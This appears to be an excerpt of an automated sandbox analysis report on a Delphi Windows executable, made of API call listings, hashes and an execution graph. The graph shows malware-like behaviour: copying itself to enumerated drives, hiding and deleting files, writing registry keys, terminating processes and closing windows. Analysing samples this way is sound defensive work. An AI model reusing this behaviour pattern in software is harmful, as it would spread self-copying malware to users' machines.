                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                            • String ID:
                                                                            • API String ID: 730355536-0
                                                                            • Opcode ID: 798072171faa28aa9536d3e14e8c46776961f52050d9d4218a56882117630c0f
                                                                            • Instruction ID: 5f09b27ca823af9dd1356ce4e247dec4ea3fcd1be7825b8ef208c2b79a25235a
                                                                            • Opcode Fuzzy Hash: 798072171faa28aa9536d3e14e8c46776961f52050d9d4218a56882117630c0f
                                                                            • Instruction Fuzzy Hash: 0E018470644340AED319AB6A9D06F163AA4E74E704F14C47BE140BB2F2D6BD44A08B5F
                                                                            Function 00404079 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00403144: GetKeyboardType.USER32(00000000), ref: 00403149
                                                                              • Part of subcall function 00403144: GetKeyboardType.USER32(00000001), ref: 00403155
                                                                            • GetCommandLineA.KERNEL32 ref: 004040CC
                                                                            • GetCurrentThreadId.KERNEL32 ref: 004040E0
                                                                              • Part of subcall function 00403174: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403196
                                                                              • Part of subcall function 00403174: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004031E5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004031C9
                                                                              • Part of subcall function 00403174: RegCloseKey.ADVAPI32(?,004031EC,00000000,?,00000004,00000000,004031E5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004031DF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: KeyboardType$CloseCommandCurrentLineOpenQueryThreadValue
                                                                            • String ID: 8&}
                                                                            • API String ID: 3316616684-945021855
                                                                            • Opcode ID: baaa3127af269219a38dde840f1c6f9df0e96bc1f23aa25374622c4cae3c8862
                                                                            • Instruction ID: f6e15f59299165cda9f09c884210f78b91d7a713eb75e9a4c49f8d115a364ab3
                                                                            • Opcode Fuzzy Hash: baaa3127af269219a38dde840f1c6f9df0e96bc1f23aa25374622c4cae3c8862
                                                                            • Instruction Fuzzy Hash: 99F0AC70811385D5E700FF62AA462093EA5AF0534DB4085BFE5807B2B7EB7D45688B6F

                                                                            Execution Graph

                                                                            Execution Coverage:26.6%
                                                                            Dynamic/Decrypted Code Coverage:3.3%
                                                                            Signature Coverage:0.3%
                                                                            Total number of Nodes:1618
                                                                            Total number of Limit Nodes:47
                                                                            execution_graph 5609 439cc7 5610 439ced 5609->5610 5611 439d06 VirtualAlloc 5610->5611 5613 439d2a 5611->5613 5616 439d46 5613->5616 5615 439d3e 5618 439d9b 5616->5618 5619 439e05 LoadLibraryA 5618->5619 5620 439e3f 5618->5620 5619->5618 5622 5418b2 5620->5622 5626 5418c0 5622->5626 5623 5418f4 CreateMutexA 5624 54190f 5623->5624 5627 439eb9 5623->5627 5625 541925 FindCloseChangeNotification 5624->5625 5624->5627 5625->5627 5626->5623 5626->5627 5627->5615 7054 4084c8 7055 406f74 60 API calls 7054->7055 7056 4084cd 7055->7056 7067 40558c FindWindowA 7056->7067 7060 4084d7 7063 4084ef 7060->7063 7108 405fb0 7060->7108 7062 408511 7063->7062 7064 404d04 GetVersionExA 7063->7064 7065 408507 7064->7065 7065->7062 7158 406354 7065->7158 7068 4055a5 EnumChildWindows 7067->7068 7069 4055c8 7067->7069 7070 4055bb FindWindowExA 7068->7070 7072 406c30 7069->7072 7071 4055c4 7070->7071 7071->7068 7071->7069 7073 404f2c 28 API calls 7072->7073 7074 406c62 7073->7074 7075 403b5c 27 API calls 7074->7075 7076 406c6f 7075->7076 7077 404cf4 4 API calls 7076->7077 7078 406c77 7077->7078 7079 406ee7 7078->7079 7080 406c7f 7078->7080 7082 4039f4 11 API calls 7079->7082 7081 404f2c 28 API calls 7080->7081 7083 406c87 7081->7083 7084 406f01 7082->7084 7085 403b5c 27 API calls 7083->7085 7084->7060 7086 406c94 7085->7086 7087 4027bc 4 API calls 7086->7087 7088 406cab 7087->7088 7089 402560 4 API calls 7088->7089 7090 406cb0 7089->7090 7091 402dec 27 API calls 7090->7091 7092 406cc0 7091->7092 7093 402e58 4 API calls 7092->7093 7094 406cca 7093->7094 7095 402560 4 API calls 7094->7095 7096 406ccf 7095->7096 7097 402ba8 4 API calls 7096->7097 7098 406cd9 7097->7098 7099 402560 4 API calls 7098->7099 7100 406cde FindWindowA 7099->7100 7100->7079 7101 406d00 GetWindowTextA 7100->7101 7102 403b3c 27 API calls 7101->7102 7107 406d32 7102->7107 7103 406ebb FindWindowExA 7103->7079 7103->7101 7104 406db2 FindWindowExA FindWindowExA FindWindowExA FindWindowExA FindWindowExA 7104->7103 7104->7107 7105 403b3c 27 API calls 7105->7107 7106 406e6b SendMessageA Sleep SendMessageA SendMessageA 7106->7103 7107->7103 7107->7104 7107->7105 7107->7106 7112 405fb8 7108->7112 7109 40601a GetDriveTypeA 7109->7112 7110 406283 7113 4039f4 11 API calls 7110->7113 7111 403ba0 27 API calls 7111->7112 7112->7109 7112->7110 7112->7111 7114 404cf4 4 API calls 7112->7114 7121 406045 7112->7121 7115 40629d 7113->7115 7114->7112 7116 4039d0 11 API calls 7115->7116 7118 4062a5 7116->7118 7117 403ba0 27 API calls 7117->7121 7118->7063 7119 404cf4 4 API calls 7119->7121 7120 4060c3 SetFileAttributesA 7122 403ba0 27 API calls 7120->7122 7121->7117 7121->7119 7121->7120 7123 406061 7121->7123 7124 4060de 7122->7124 7125 403ba0 27 API calls 7123->7125 7127 4060e6 SetFileAttributesA 7124->7127 7126 406073 7125->7126 7129 40607b SetFileAttributesA 7126->7129 7128 403ba0 27 API calls 7127->7128 7130 4060fc 7128->7130 7131 403ba0 27 API calls 7129->7131 7133 406104 DeleteFileA 7130->7133 7132 406093 7131->7132 7135 40609b SetFileAttributesA 7132->7135 7134 403ba0 27 API calls 7133->7134 7136 40611a 7134->7136 7135->7110 7137 406122 DeleteFileA 7136->7137 7138 403e74 27 API calls 7137->7138 7139 406134 7138->7139 7140 406140 GetModuleFileNameA 7139->7140 7141 403e74 27 API calls 7140->7141 7143 406155 7141->7143 7142 403ba0 27 API calls 7142->7143 7143->7142 7144 406177 CopyFileA 7143->7144 7145 403ba0 27 API calls 7144->7145 7153 40618d 7145->7153 7146 4027c8 4 API calls 7146->7153 7147 402560 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 7147->7153 7148 4027d4 4 API calls 7148->7153 7149 403ed8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 7149->7153 7150 4030f4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 7150->7153 7151 402ba8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 7151->7153 7152 403ba0 27 API calls 7152->7153 7153->7146 7153->7147 7153->7148 7153->7149 7153->7150 7153->7151 7153->7152 7154 406253 SetFileAttributesA 7153->7154 7155 403ba0 27 API calls 7154->7155 7156 40626b 7155->7156 7157 406273 SetFileAttributesA 7156->7157 7157->7112 7162 40635c 7158->7162 7159 4063be GetDriveTypeA 7159->7162 7160 403ba0 27 API calls 7160->7162 7161 406627 7164 4039f4 11 API calls 7161->7164 7162->7159 7162->7160 7162->7161 7163 404cf4 4 API calls 7162->7163 7171 4063e9 7162->7171 7163->7162 7165 406641 7164->7165 7166 4039d0 11 API calls 7165->7166 7168 406649 7166->7168 7167 403ba0 27 API calls 7167->7171 7168->7062 7169 404cf4 4 API calls 7169->7171 7170 406467 SetFileAttributesA 7172 403ba0 27 API calls 7170->7172 7171->7167 7171->7169 7171->7170 7173 406405 7171->7173 7174 406482 7172->7174 7175 403ba0 27 API calls 7173->7175 7177 40648a SetFileAttributesA 7174->7177 7176 406417 7175->7176 7179 40641f SetFileAttributesA 7176->7179 7178 403ba0 27 API calls 7177->7178 7180 4064a0 7178->7180 7181 403ba0 27 API calls 7179->7181 7183 4064a8 DeleteFileA 7180->7183 7182 406437 7181->7182 7185 40643f SetFileAttributesA 7182->7185 7184 403ba0 27 API calls 7183->7184 7186 4064be 7184->7186 7185->7161 7187 4064c6 DeleteFileA 7186->7187 7188 403e74 27 API calls 7187->7188 7189 4064d8 7188->7189 7190 4064e4 GetModuleFileNameA 7189->7190 7191 403e74 27 API calls 7190->7191 7193 4064f9 7191->7193 7192 403ba0 27 API calls 7192->7193 7193->7192 7194 40651b CopyFileA 7193->7194 7195 403ba0 27 API calls 7194->7195 7203 406531 7195->7203 7196 4027c8 4 API calls 7196->7203 7197 403ba0 27 API calls 7197->7203 7198 4027d4 4 API calls 7198->7203 7199 4030f4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 7199->7203 7200 402560 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 7200->7203 7201 403ed8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 7201->7203 7202 402ba8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 7202->7203 7203->7196 7203->7197 7203->7198 7203->7199 7203->7200 7203->7201 7203->7202 7204 4065f7 SetFileAttributesA 7203->7204 7205 403ba0 27 API calls 7204->7205 7206 40660f 7205->7206 7207 406617 SetFileAttributesA 7206->7207 7207->7162 7212 43834b 7213 43835e VirtualFree 7212->7213 7216 438408 7213->7216 7220 438524 7216->7220 7217 438518 7218 4384f9 VirtualProtect 7218->7217 7218->7218 7222 43844c 7220->7222 7223 438532 7220->7223 7221 438550 LoadLibraryA 7221->7222 7221->7223 7222->7217 7222->7218 7223->7221 7223->7222 7418 43814a 7419 438159 7418->7419 7421 4381fa 7419->7421 7422 438214 7421->7422 7423 43851d 7422->7423 7424 438231 VirtualAlloc 7422->7424 7423->7419 7424->7423 7425 438273 7424->7425 7426 43827e 3 API calls 7425->7426 7426->7423 5628 408bd4 5629 408bdc 5628->5629 5629->5629 5685 4041b0 GetModuleHandleA 5629->5685 5632 408c45 5689 404f2c GetWindowsDirectoryA 5632->5689 5633 408c0f FindWindowA PostMessageA FindWindowA SendMessageA 5633->5632 5637 408c5f 5638 408c67 SetFileAttributesA 5637->5638 5708 403e74 5638->5708 5640 408c7c 5641 408c8d GetModuleFileNameA 5640->5641 5642 403e74 27 API calls 5641->5642 5643 408ca5 5642->5643 5644 404f2c 28 API calls 5643->5644 5645 408cad 5644->5645 5646 403b5c 27 API calls 5645->5646 5647 408cba 5646->5647 5648 408cc2 DeleteFileA 5647->5648 5649 404f2c 28 API calls 5648->5649 5650 408cd2 5649->5650 5651 403b5c 27 API calls 5650->5651 5652 408cdf 5651->5652 5653 408cf4 CopyFileA 5652->5653 5714 404a64 5653->5714 5656 404f2c 28 API calls 5657 408d15 5656->5657 5658 403b5c 27 API calls 5657->5658 5659 408d22 5658->5659 5660 404a64 28 API calls 5659->5660 5661 408d2d 5660->5661 5662 408d38 5661->5662 5663 408d79 5661->5663 5665 404d98 28 API calls 5662->5665 5720 404d98 5663->5720 5667 408d3d 5665->5667 5669 406928 36 API calls 5667->5669 5671 408d42 5669->5671 5673 404f2c 28 API calls 5671->5673 5675 408d50 5673->5675 5674 408d88 5810 408a20 LoadIconA LoadCursorA RegisterClassA 5674->5810 5677 403b5c 27 API calls 5675->5677 5679 408d5d 5677->5679 5678 408d8d 5830 4039f4 5678->5830 5681 408d65 ShellExecuteA 5679->5681 5819 407d8c 5681->5819 5684 408d77 5684->5678 5686 4041e3 5685->5686 5834 403788 5686->5834 5690 403b3c 27 API calls 5689->5690 5691 404f52 5690->5691 5692 404f6e 5691->5692 5693 403b5c 27 API calls 5691->5693 5694 403b5c 5692->5694 5693->5692 5695 403b60 5694->5695 5696 403b9f 5694->5696 5697 403a24 5695->5697 5698 403b6a 5695->5698 5696->5637 5704 403a94 27 API calls 5697->5704 5705 403a38 5697->5705 5699 403b94 5698->5699 5700 403b7d 5698->5700 5702 403e74 27 API calls 5699->5702 5703 403e74 27 API calls 5700->5703 5701 403a66 5701->5637 5707 403b82 5702->5707 5703->5707 5704->5705 5705->5701 5706 40248c 11 API calls 5705->5706 5706->5701 5707->5637 5709 403e81 5708->5709 5713 403eb1 5708->5713 5711 403e8d 5709->5711 5712 403a94 27 API calls 5709->5712 5710 4039d0 11 API calls 5710->5711 5711->5640 5712->5713 5713->5710 5715 404a72 5714->5715 6951 403ac0 5715->6951 5718 404a93 5718->5656 5719 404a8a CharUpperBuffA 5719->5718 5721 403e74 27 API calls 5720->5721 5722 404da7 5721->5722 5723 404db6 GetModuleFileNameA 5722->5723 5724 403e74 27 API calls 5723->5724 5725 404dce 5724->5725 5726 406928 5725->5726 5727 406930 5726->5727 6956 402f90 5727->6956 5730 402560 4 API calls 5731 40697c 5730->5731 6960 402c3c 5731->6960 5734 402560 4 API calls 5735 40698c 5734->5735 6968 402fac 5735->6968 5737 40699c 5738 402560 4 API calls 5737->5738 5739 4069a1 5738->5739 6975 402b88 5739->6975 5742 402560 4 API calls 5743 4069ba 5742->5743 5744 402c3c 6 API calls 5743->5744 5745 4069d8 5744->5745 5746 402560 4 API calls 5745->5746 5747 4069dd 5746->5747 5748 402fac 6 API calls 5747->5748 5749 4069ef 5748->5749 5750 402560 4 API calls 5749->5750 5751 4069f4 5750->5751 5752 402b88 6 API calls 5751->5752 5753 406a1b 5752->5753 5754 402560 4 API calls 5753->5754 5755 406a20 5754->5755 5756 403ac0 27 API calls 5755->5756 5757 406a36 5756->5757 6978 404d48 5757->6978 5762 404dd0 27 API calls 5763 406a6a 5762->5763 5764 403a24 27 API calls 5763->5764 5765 406a7a 5764->5765 5766 403da4 27 API calls 5765->5766 5767 406a95 5766->5767 5768 404dd0 27 API calls 5767->5768 5769 406aa6 5768->5769 5770 403a24 27 API calls 5769->5770 5771 406ab6 5770->5771 5772 403da4 27 API calls 5771->5772 5773 406ad3 5772->5773 5774 404dd0 27 API calls 5773->5774 5775 406ae4 5774->5775 5776 403a24 27 API calls 5775->5776 5777 406af4 5776->5777 5778 403da4 27 API calls 5777->5778 5779 406b11 5778->5779 5780 404dd0 27 API calls 5779->5780 5781 406b22 5780->5781 5782 403a24 27 API calls 5781->5782 5783 406b32 5782->5783 5784 403da4 27 API calls 5783->5784 5785 406b4f 5784->5785 5786 404dd0 27 API calls 5785->5786 5787 406b60 5786->5787 5788 403a24 27 API calls 5787->5788 5789 406b70 5788->5789 5790 403da4 27 API calls 5789->5790 5791 406b8d 5790->5791 5792 404dd0 27 API calls 5791->5792 5793 406b9e 5792->5793 5794 403a24 27 API calls 5793->5794 5795 406bae 5794->5795 5796 403da4 27 API calls 5795->5796 5797 406bcb 5796->5797 5798 404dd0 27 API calls 5797->5798 5799 406bdc 5798->5799 5800 403a24 27 API calls 5799->5800 5801 406bec 5800->5801 5802 402ba8 4 API calls 5801->5802 5803 406bf7 5802->5803 5804 402560 4 API calls 5803->5804 5805 406bfc 5804->5805 5806 4039f4 11 API calls 5805->5806 5807 406c19 5806->5807 5808 4039d0 11 API calls 5807->5808 5809 406c21 5808->5809 5824 4049cc GetVersionExA 5809->5824 5811 408b10 5810->5811 5812 408a88 5810->5812 5811->5678 7017 404414 CreateWindowExA 5812->7017 5814 408aae 5814->5811 5815 408abc SetTimer 5814->5815 5816 408aeb GetMessageA 5815->5816 5817 408afb KillTimer 5816->5817 5818 408adf TranslateMessage DispatchMessageA 5816->5818 5817->5811 5818->5816 5820 407d9d 5819->5820 5821 407da5 5820->5821 7018 4050dc GetEnvironmentVariableA 5820->7018 5821->5684 5825 404a32 5824->5825 5826 4049e9 5824->5826 5825->5674 5826->5825 5827 4049f0 LoadLibraryA 5826->5827 5827->5825 5828 404a08 GetProcAddress 5827->5828 5829 404a27 FreeLibrary 5828->5829 5829->5825 5832 4039fa 5830->5832 5831 403a20 5832->5831 5833 40248c 11 API calls 5832->5833 5833->5832 5835 4037bb 5834->5835 5838 403728 5835->5838 5839 403764 FindWindowA 5838->5839 5840 403737 5838->5840 5839->5632 5839->5633 5840->5839 5844 408550 5840->5844 5919 40854e 5840->5919 5994 408494 InternetGetConnectedState 5840->5994 5845 408558 5844->5845 5845->5845 5846 4087e5 5845->5846 6000 406f74 GetDesktopWindow 5845->6000 5849 4039f4 11 API calls 5846->5849 5851 4087ff 5849->5851 5851->5840 5854 40859b 5855 404dd0 27 API calls 5854->5855 5856 4085b1 5855->5856 6069 404c18 5856->6069 5861 404f2c 28 API calls 5862 4085db 5861->5862 5863 403b5c 27 API calls 5862->5863 5864 4085e8 5863->5864 6085 404af8 5864->6085 5867 404f2c 28 API calls 5868 40860f 5867->5868 5869 403b5c 27 API calls 5868->5869 5870 40861c 5869->5870 5871 408624 DeleteFileA 5870->5871 6094 4042ac CreateMutexA 5871->6094 5873 408638 6095 4042ac CreateMutexA 5873->6095 5875 408646 6096 4042ac CreateMutexA 5875->6096 5877 408654 5878 404f2c 28 API calls 5877->5878 5879 40865c 5878->5879 5880 404dd0 27 API calls 5879->5880 5881 40866d 5880->5881 5882 403b5c 27 API calls 5881->5882 5883 408676 5882->5883 5884 40867e DeleteFileA 5883->5884 6097 4042ac CreateMutexA 5884->6097 5886 408692 5887 404dd0 27 API calls 5886->5887 5888 40869f 5887->5888 6098 404854 5888->6098 5891 404dd0 27 API calls 5892 4086b4 5891->5892 5893 404854 49 API calls 5892->5893 5894 4086bc 5893->5894 6114 404b70 5894->6114 5897 404b70 14 API calls 5898 4086e4 5897->5898 5899 404b70 14 API calls 5898->5899 5900 4086f8 5899->5900 5901 404b70 14 API calls 5900->5901 5902 40870c 5901->5902 5903 404b70 14 API calls 5902->5903 5904 408720 5903->5904 5905 404dd0 27 API calls 5904->5905 5906 40872d 5905->5906 5907 404b70 14 API calls 5906->5907 5908 40873f 5907->5908 5909 404dd0 27 API calls 5908->5909 5910 40874c 5909->5910 5911 404b70 14 API calls 5910->5911 5912 40875e 5911->5912 5913 404d98 28 API calls 5912->5913 5914 408763 5913->5914 5915 406928 36 API calls 5914->5915 5916 408768 5915->5916 5917 408494 46 API calls 5916->5917 5918 40876d CreateThread CreateThread CreateThread CreateThread CreateThread 5917->5918 5918->5846 6259 407dd0 Sleep 5918->6259 6280 407f54 Sleep 5918->6280 6297 4084b8 Sleep 5918->6297 6300 407bec 5918->6300 6332 4072ac 5918->6332 5921 408550 5919->5921 5920 4087e5 5924 4039f4 11 API calls 5920->5924 5921->5920 5922 406f74 60 API calls 5921->5922 5923 408580 5922->5923 5925 4039d0 11 API calls 5923->5925 5926 4087ff 5924->5926 5927 40858a 5925->5927 5926->5840 5928 404dd0 27 API calls 5927->5928 5929 40859b 5928->5929 5930 404dd0 27 API calls 5929->5930 5931 4085b1 5930->5931 5932 404c18 31 API calls 5931->5932 5933 4085c6 5932->5933 5934 403a24 27 API calls 5933->5934 5935 4085d3 5934->5935 5936 404f2c 28 API calls 5935->5936 5937 4085db 5936->5937 5938 403b5c 27 API calls 5937->5938 5939 4085e8 5938->5939 5940 404af8 30 API calls 5939->5940 5941 408607 5940->5941 5942 404f2c 28 API calls 5941->5942 5943 40860f 5942->5943 5944 403b5c 27 API calls 5943->5944 5945 40861c 5944->5945 5946 408624 DeleteFileA 5945->5946 6871 4042ac CreateMutexA 5946->6871 5948 408638 6872 4042ac CreateMutexA 5948->6872 5950 408646 6873 4042ac CreateMutexA 5950->6873 5952 408654 5953 404f2c 28 API calls 5952->5953 5954 40865c 5953->5954 5955 404dd0 27 API calls 5954->5955 5956 40866d 5955->5956 5957 403b5c 27 API calls 5956->5957 5958 408676 5957->5958 5959 40867e DeleteFileA 5958->5959 6874 4042ac CreateMutexA 5959->6874 5961 408692 5962 404dd0 27 API calls 5961->5962 5963 40869f 5962->5963 5964 404854 49 API calls 5963->5964 5965 4086a7 5964->5965 5966 404dd0 27 API calls 5965->5966 5967 4086b4 5966->5967 5968 404854 49 API calls 5967->5968 5969 4086bc 5968->5969 5970 404b70 14 API calls 5969->5970 5971 4086d0 5970->5971 5972 404b70 14 API calls 5971->5972 5973 4086e4 5972->5973 5974 404b70 14 API calls 5973->5974 5975 4086f8 5974->5975 5976 404b70 14 API calls 5975->5976 5977 40870c 5976->5977 5978 404b70 14 API calls 5977->5978 5979 408720 5978->5979 5980 404dd0 27 API calls 5979->5980 5981 40872d 5980->5981 5982 404b70 14 API calls 5981->5982 5983 40873f 5982->5983 5984 404dd0 27 API calls 5983->5984 5985 40874c 5984->5985 5986 404b70 14 API calls 5985->5986 5987 40875e 5986->5987 5988 404d98 28 API calls 5987->5988 5989 408763 5988->5989 5990 406928 36 API calls 5989->5990 5991 408768 5990->5991 5992 408494 46 API calls 5991->5992 5993 40876d CreateThread CreateThread CreateThread CreateThread CreateThread 5992->5993 5993->5920 6875 407dd0 45 API calls 5993->6875 6876 407f54 68 API calls 5993->6876 6877 4084b8 47 API calls 5993->6877 6878 407bec 37 API calls 5993->6878 6879 4072ac 75 API calls 5993->6879 5995 4084b6 5994->5995 5996 4084ac 5994->5996 5995->5840 6880 4080c8 5996->6880 6001 406fab FindWindowExA GetWindowTextA 6000->6001 6122 403b3c 6001->6122 6003 406fe1 PostMessageA 6004 406fd0 6003->6004 6004->6001 6004->6003 6005 406ff1 GetDesktopWindow 6004->6005 6006 406ff8 FindWindowExA GetWindowTextA 6005->6006 6007 403b3c 27 API calls 6006->6007 6008 40701d 6007->6008 6008->6006 6009 40702e PostMessageA 6008->6009 6010 40703e GetDesktopWindow 6008->6010 6009->6008 6011 407045 FindWindowExA GetWindowTextA 6010->6011 6012 403b3c 27 API calls 6011->6012 6013 40706a 6012->6013 6013->6011 6014 40707b PostMessageA 6013->6014 6015 40708b GetDesktopWindow 6013->6015 6014->6013 6016 407092 FindWindowExA GetWindowTextA 6015->6016 6017 403b3c 27 API calls 6016->6017 6018 4070b7 6017->6018 6018->6016 6019 4070c8 PostMessageA 6018->6019 6020 4070d8 GetDesktopWindow 6018->6020 6019->6018 6021 4070df FindWindowExA GetWindowTextA 6020->6021 6022 403b3c 27 API calls 6021->6022 6023 407104 6022->6023 6023->6021 6024 407115 PostMessageA 6023->6024 6025 407125 GetDesktopWindow 6023->6025 6024->6023 6026 40712c FindWindowExA GetWindowTextA 6025->6026 6027 403b3c 27 API calls 6026->6027 6029 407151 6027->6029 6028 407162 PostMessageA 6028->6029 6029->6026 6029->6028 6030 407172 FindWindowA 6029->6030 6031 407182 FindWindowA PostMessageA 6030->6031 6032 40719a FindWindowA 6030->6032 6031->6032 6033 4071c2 FindWindowA 6032->6033 6034 4071aa FindWindowA PostMessageA 6032->6034 6035 4071f0 6033->6035 6036 4071d5 FindWindowA PostMessageA 6033->6036 6034->6033 6037 4039f4 11 API calls 6035->6037 6036->6035 6038 40720a 6037->6038 6039 4039d0 6038->6039 6040 4039d6 6039->6040 6042 4039f1 6039->6042 6040->6042 6192 40248c 6040->6192 6043 404dd0 6042->6043 6044 404dd8 6043->6044 6045 404e12 6044->6045 6046 404e05 6044->6046 6196 403a68 6045->6196 6047 4039d0 11 API calls 6046->6047 6049 404e0d 6047->6049 6053 4039f4 11 API calls 6049->6053 6051 403a68 11 API calls 6052 404e2c 6051->6052 6054 403a68 11 API calls 6052->6054 6056 404ee5 6053->6056 6055 404e39 6054->6055 6057 403a68 11 API calls 6055->6057 6058 4039d0 11 API calls 6056->6058 6059 404e46 6057->6059 6060 404eed 6058->6060 6200 403c14 6059->6200 6060->5854 6209 404bfc RegOpenKeyExA 6069->6209 6071 404c35 RegQueryValueExA 6072 404c77 6071->6072 6073 404c5d 6071->6073 6074 4039d0 11 API calls 6072->6074 6075 403b3c 27 API calls 6073->6075 6076 404c7e RegCloseKey 6074->6076 6077 404c6f RegCloseKey 6075->6077 6078 404c84 6076->6078 6077->6078 6079 403a24 6078->6079 6080 403a28 6079->6080 6081 403a38 6079->6081 6080->6081 6083 403a94 27 API calls 6080->6083 6082 403a66 6081->6082 6084 40248c 11 API calls 6081->6084 6082->5861 6083->6081 6084->6082 6210 404acc RegCreateKeyExA 6085->6210 6087 404b1e 6211 403b00 6087->6211 6089 404b2a 6090 404b32 RegSetValueExA RegCloseKey 6089->6090 6091 404b55 6090->6091 6092 4039d0 11 API calls 6091->6092 6093 404b5d 6092->6093 6093->5867 6094->5873 6095->5875 6096->5877 6097->5886 6099 404897 6098->6099 6217 4047bc 6099->6217 6101 4048b9 6222 4047dc 6101->6222 6103 404996 6105 4039f4 11 API calls 6103->6105 6104 403b3c 27 API calls 6113 4048ca 6104->6113 6107 4049b3 6105->6107 6108 4039d0 11 API calls 6107->6108 6109 4049bb 6108->6109 6109->5891 6110 40496e OpenProcess TerminateProcess 6110->6113 6112 404fdc 27 API calls 6112->6113 6113->6103 6113->6104 6113->6110 6113->6112 6227 405018 6113->6227 6237 4047fc 6113->6237 6115 404b87 6114->6115 6116 404ba9 RegOpenKeyA 6115->6116 6257 403d4c 6116->6257 6119 404be2 6120 4039f4 11 API calls 6119->6120 6121 404bef 6120->6121 6121->5897 6123 403ac0 6122->6123 6128 403a94 6123->6128 6125 403ad0 6126 4039d0 11 API calls 6125->6126 6127 403ae8 6126->6127 6127->6004 6129 403a98 6128->6129 6130 403abc 6128->6130 6133 40246c 6129->6133 6130->6125 6134 402471 6133->6134 6135 402484 6133->6135 6140 401ea4 6134->6140 6151 401ea5 6134->6151 6135->6125 6136 402477 6136->6135 6162 402554 6136->6162 6141 401ea5 6140->6141 6142 401ebd 6141->6142 6168 4017b8 RtlInitializeCriticalSection 6141->6168 6144 401eea RtlEnterCriticalSection 6142->6144 6145 401ef4 6142->6145 6148 401ec9 6142->6148 6144->6145 6145->6148 6175 401db0 6145->6175 6148->6136 6149 402015 RtlLeaveCriticalSection 6150 40201f 6149->6150 6150->6136 6152 401eb8 6151->6152 6155 401ebd 6151->6155 6153 4017b8 4 API calls 6152->6153 6153->6155 6154 401eea RtlEnterCriticalSection 6156 401ef4 6154->6156 6155->6154 6155->6156 6159 401ec9 6155->6159 6157 401db0 12 API calls 6156->6157 6156->6159 6158 401ffc 6157->6158 6160 402015 RtlLeaveCriticalSection 6158->6160 6161 40201f 6158->6161 6159->6136 6160->6161 6161->6136 6164 402508 6162->6164 6163 40252d 6189 4024fc 6163->6189 6164->6163 6181 404164 6164->6181 6169 4017e6 6168->6169 6170 4017dc RtlEnterCriticalSection 6168->6170 6171 401804 LocalAlloc 6169->6171 6170->6169 6172 40181e 6171->6172 6173 401863 RtlLeaveCriticalSection 6172->6173 6174 40186d 6172->6174 6173->6174 6174->6142 6177 401dc0 6175->6177 6176 401dec 6178 401bc4 9 API calls 6176->6178 6180 401e10 6176->6180 6177->6176 6179 401d24 12 API calls 6177->6179 6177->6180 6178->6180 6179->6177 6180->6149 6180->6150 6182 404173 6181->6182 6183 404199 TlsGetValue 6181->6183 6182->6163 6184 4041a3 6183->6184 6185 40417e 6183->6185 6184->6163 6186 404120 LocalAlloc TlsSetValue 6185->6186 6187 404183 TlsGetValue 6186->6187 6188 404192 6187->6188 6188->6163 6190 4039b8 7 API calls 6189->6190 6191 402507 6190->6191 6191->6135 6193 402491 6192->6193 6195 4024a4 6192->6195 6194 402554 11 API calls 6193->6194 6193->6195 6194->6195 6195->6042 6198 403a6c 6196->6198 6197 403a90 6197->6051 6198->6197 6199 40248c 11 API calls 6198->6199 6199->6197 6201 403c25 6200->6201 6202 403c45 6201->6202 6203 403c59 6201->6203 6204 403e74 27 API calls 6202->6204 6205 403a94 27 API calls 6203->6205 6207 403c53 6204->6207 6205->6207 6206 403c8a 6207->6206 6208 403a24 27 API calls 6207->6208 6208->6206 6209->6071 6210->6087 6213 403ac0 6211->6213 6212 403a94 27 API calls 6214 403ad0 6212->6214 6213->6212 6215 4039d0 11 API calls 6214->6215 6216 403ae8 6215->6216 6216->6089 6242 404540 6217->6242 6220 4047d6 6220->6101 6221 4047cb CreateToolhelp32Snapshot 6221->6101 6223 404540 17 API calls 6222->6223 6224 4047e7 6223->6224 6225 4047f6 6224->6225 6226 4047eb Process32First 6224->6226 6225->6113 6226->6113 6228 40502a 6227->6228 6233 405067 6228->6233 6246 403de4 6228->6246 6230 405096 6231 403a24 27 API calls 6230->6231 6232 4050a0 6231->6232 6235 4039d0 11 API calls 6232->6235 6233->6230 6234 403de4 27 API calls 6233->6234 6234->6233 6236 4050b5 6235->6236 6236->6113 6238 404540 17 API calls 6237->6238 6239 404807 6238->6239 6240 404816 6239->6240 6241 40480b Process32Next 6239->6241 6240->6113 6241->6113 6243 40454f GetModuleHandleA 6242->6243 6245 404684 6242->6245 6244 404564 16 API calls 6243->6244 6243->6245 6244->6245 6245->6220 6245->6221 6251 403d9c 6246->6251 6248 403e28 6248->6228 6249 403df2 6249->6248 6250 403e74 27 API calls 6249->6250 6250->6248 6252 403d58 6251->6252 6253 403a94 27 API calls 6252->6253 6254 403d93 6252->6254 6255 403d6f 6253->6255 6254->6249 6255->6254 6256 40248c 11 API calls 